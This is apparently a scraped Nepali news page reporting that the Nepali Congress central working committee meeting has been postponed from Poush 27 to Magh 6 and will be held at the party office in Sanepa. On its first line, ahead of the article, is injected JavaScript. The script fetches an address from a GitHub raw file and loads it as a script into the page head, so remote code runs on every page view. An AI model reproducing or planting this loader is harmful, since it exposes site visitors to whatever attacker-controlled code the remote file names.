;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
पुष २४,
काठमाडौं । नेपाली कांग्रेस केन्द्रीय कार्यसमितिको बैठक सरेको छ । आगामी पुस २७ गतेका लागि डाकेको बैठक माघ ६ गतेको लागि सरेको कांग्रेसका मुख्य सचिव कृष्णाप्रसाद् पौडेलले जानकारी दिए ।
प्रेस विज्ञप्ति जारी गर्दै पौडेलले मंगलबार दिनको १ बजे बस्ने भएको जानकारी दिए । यसअघि बैठक २७ गतेकाल लागि डाकिएको थियो ।
बैठक पार्टीको केन्द्रीय कार्यालय सानेपामा बस्ने छ । बैठक किन सरेको भन्ने खुलाईएको छैन् ।
फेसबुक प्रतिक्रियाहरु